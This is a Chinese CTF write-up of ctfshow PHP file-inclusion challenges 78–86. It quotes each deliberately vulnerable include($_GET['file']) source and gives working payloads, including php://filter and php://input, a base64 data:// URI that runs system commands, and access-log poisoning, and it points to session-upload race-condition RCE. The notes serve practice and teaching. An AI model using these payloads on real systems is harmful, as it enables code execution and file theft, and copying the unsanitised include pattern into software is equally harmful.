前言

1.什么是文件包含？

通过PHP函数引入文件时，传入的文件名没有经过合理的验证，从而操作了预想之外的文件，就可能导致意
外的文件泄漏甚至恶意代码注入。

2.文件包含的要求是什么？

alow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据
allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件

3.通过什么触发？
通过php函数例如include，require等等
include只生成警告但是会继续执行
require生成警告但是停止执行

include包含txt也会把里面的内容当做php代码来执行。

78

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:10:14
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
}

伪协议随意操作?file=php://filter/read=convert.base64-encode/resource=flag.php
当然这是知道flag在哪的时候，可以先?file=php://input
然后post传php代码就可以直接执行，但是最好是用bp来做
先`<?php system("ls");?>.
再cat flag.php即可

79

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:10:14
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

过滤了php
用data来读
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

80、81

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

data也过滤了，用日志包含试试，可以包含我们自己的文件，先发个请求

然后file=/var/log/nginx/access.log
然后ls cat fl0g.php

82-86

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

句号没了，日志包含不了,可以利用session.upload_progress进行文件包含，然后条件竞争，rce。脚本就不放了，网上很多

[CTF]CTFSHOW文件包含练习笔记相关推荐

ctfshow 文件包含Web78-79
Ctfshow文件包含漏洞 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件.如果文件中存在恶意代码,无论文件是什么类型 ...
CG CTF WEB 文件包含
http://4.chinalover.sinaapp.com/web7/index.php 题解: 文件包含漏洞的格式网址,通过php://filter读取index源码-->php://fi ...
php文件包含读源码,CTF PHP文件包含--session
PHP文件包含 Session 首先了解一下PHP文件包含漏洞----包含session 利用条件:session文件路径已知,且其中内容部分可控. 姿势: php的session文件的保存路径可以在 ...
php文件包含session,CTF PHP文件包含--session
PHP文件包含 Session 首先了解一下PHP文件包含漏洞----包含session 利用条件:session文件路径已知,且其中内容部分可控. 姿势: php的session文件的保存路径可以在 ...
CTF之文件包含的猥琐思路
From: i春秋百度杯"CTF 一: <?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['h ...
CTFshow 文件包含 web82
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
CTFshow 文件包含 web80
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
ctfshow 文件包含 web 78 -117
目录 web 78 web 79 web 80 web 81 web 82-86(环境暂时做不了) web 87 web 88 web 116 web 117 web 78 data://text/p ...
CTFshow 文件包含 web116
目录源码思路题解总结源码下载视频用winhex分离出png 思路可以正常读文件题解直接跑字典总结水题
CTFshow 文件包含 web87
目录源码思路题解题解一题解二总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11: ...

[CTF]CTFSHOW文件包含练习笔记

前言

include包含txt也会把里面的内容当做php代码来执行。

78

79

80、81

82-86

[CTF]CTFSHOW文件包含练习笔记相关推荐

最新文章

热门文章